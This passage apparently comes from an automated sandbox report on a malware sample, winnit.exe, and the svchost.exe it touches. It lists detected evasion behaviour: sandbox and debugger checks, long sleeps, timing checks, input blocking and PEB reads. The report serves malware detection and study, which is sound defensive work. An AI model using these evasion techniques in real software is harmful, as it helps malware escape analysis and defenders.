Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\AppData\Roaming\winnit.exe API/Special instruction interceptor: Address: F72B5C
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: winnit.exe, 00000006.00000003.2175727161.0000000001026000.00000004.00000020.00020000.00000000.sdmp, winnit.exe, 00000006.00000002.2186743274.0000000001026000.00000004.00000020.00020000.00000000.sdmp, winnit.exe, 00000006.00000003.2175628486.0000000000FBA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCMON.EXEZ^
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BAD1C0 rdtsc 7_2_03BAD1C0
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7315 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2268 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Roaming\winnit.exe API coverage: 4.4 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3228 Thread sleep count: 7315 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7140 Thread sleep count: 2268 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6196 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 4268 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B1445A GetFileAttributesW,FindFirstFileW,FindClose, 6_2_00B1445A
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B1C6D1 FindFirstFileW,FindClose, 6_2_00B1C6D1
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B1C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 6_2_00B1C75C
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B1EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00B1EF95
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B1F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00B1F0F2
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B1F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_00B1F3F3
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B137EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00B137EF
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B13B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00B13B12
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B1BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_00B1BCBC
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AB49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 6_2_00AB49A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000003.00000002.2184138928.00000000078C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.2180350037.0000000003668000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MSFTMSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.2187516853.000000000893E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.2180350037.0000000003668000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FsulatedPMSFT_NetEventVmNetworkAdatper.cdxml
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BAD1C0 rdtsc 7_2_03BAD1C0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00417EA3 LdrLoadDll, 7_2_00417EA3
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B23F09 BlockInput, 6_2_00B23F09
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AB3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 6_2_00AB3B3A
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AE5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 6_2_00AE5A7C
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AB4B37 LoadLibraryA,GetProcAddress, 6_2_00AB4B37
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00F71798 mov eax, dword ptr fs:[00000030h] 6_2_00F71798
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00F72DC8 mov eax, dword ptr fs:[00000030h] 6_2_00F72DC8
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00F72E28 mov eax, dword ptr fs:[00000030h] 6_2_00F72E28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B533A5 mov eax, dword ptr fs:[00000030h] 7_2_03B533A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B633A0 mov eax, dword ptr fs:[00000030h] 7_2_03B633A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B633A0 mov eax, dword ptr fs:[00000030h] 7_2_03B633A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B8739A mov eax, dword ptr fs:[00000030h] 7_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B8739A mov eax, dword ptr fs:[00000030h] 7_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B28397 mov eax, dword ptr fs:[00000030h] 7_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B28397 mov eax, dword ptr fs:[00000030h] 7_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B28397 mov eax, dword ptr fs:[00000030h] 7_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2E388 mov eax, dword ptr fs:[00000030h] 7_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2E388 mov eax, dword ptr fs:[00000030h] 7_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2E388 mov eax, dword ptr fs:[00000030h] 7_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5438F mov eax, dword ptr fs:[00000030h] 7_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5438F mov eax, dword ptr fs:[00000030h] 7_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C053FC mov eax, dword ptr fs:[00000030h] 7_2_03C053FC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] 7_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] 7_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] 7_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B663FF mov eax, dword ptr fs:[00000030h] 7_2_03B663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEF3E6 mov eax, dword ptr fs:[00000030h] 7_2_03BEF3E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C0539D mov eax, dword ptr fs:[00000030h] 7_2_03C0539D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h] 7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h] 7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h] 7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h] 7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h] 7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h] 7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h] 7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h] 7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEB3D0 mov ecx, dword ptr fs:[00000030h] 7_2_03BEB3D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEC3CD mov eax, dword ptr fs:[00000030h] 7_2_03BEC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B383C0 mov eax, dword ptr fs:[00000030h] 7_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B383C0 mov eax, dword ptr fs:[00000030h] 7_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B383C0 mov eax, dword ptr fs:[00000030h] 7_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B383C0 mov eax, dword ptr fs:[00000030h] 7_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C05341 mov eax, dword ptr fs:[00000030h] 7_2_03C05341
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B27330 mov eax, dword ptr fs:[00000030h] 7_2_03B27330
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF132D mov eax, dword ptr fs:[00000030h] 7_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF132D mov eax, dword ptr fs:[00000030h] 7_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5F32A mov eax, dword ptr fs:[00000030h] 7_2_03B5F32A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2C310 mov ecx, dword ptr fs:[00000030h] 7_2_03B2C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B50310 mov ecx, dword ptr fs:[00000030h] 7_2_03B50310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB930B mov eax, dword ptr fs:[00000030h] 7_2_03BB930B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB930B mov eax, dword ptr fs:[00000030h] 7_2_03BB930B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB930B mov eax, dword ptr fs:[00000030h] 7_2_03BB930B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6A30B mov eax, dword ptr fs:[00000030h] 7_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6A30B mov eax, dword ptr fs:[00000030h] 7_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6A30B mov eax, dword ptr fs:[00000030h] 7_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BD437C mov eax, dword ptr fs:[00000030h] 7_2_03BD437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B37370 mov eax, dword ptr fs:[00000030h] 7_2_03B37370
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B37370 mov eax, dword ptr fs:[00000030h] 7_2_03B37370
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B37370 mov eax, dword ptr fs:[00000030h] 7_2_03B37370
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEF367 mov eax, dword ptr fs:[00000030h] 7_2_03BEF367
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B29353 mov eax, dword ptr fs:[00000030h] 7_2_03B29353
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B29353 mov eax, dword ptr fs:[00000030h] 7_2_03B29353
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB035C mov eax, dword ptr fs:[00000030h] 7_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB035C mov eax, dword ptr fs:[00000030h] 7_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB035C mov eax, dword ptr fs:[00000030h] 7_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB035C mov ecx, dword ptr fs:[00000030h] 7_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB035C mov eax, dword ptr fs:[00000030h] 7_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB035C mov eax, dword ptr fs:[00000030h] 7_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFA352 mov eax, dword ptr fs:[00000030h] 7_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h] 7_2_03BB2349
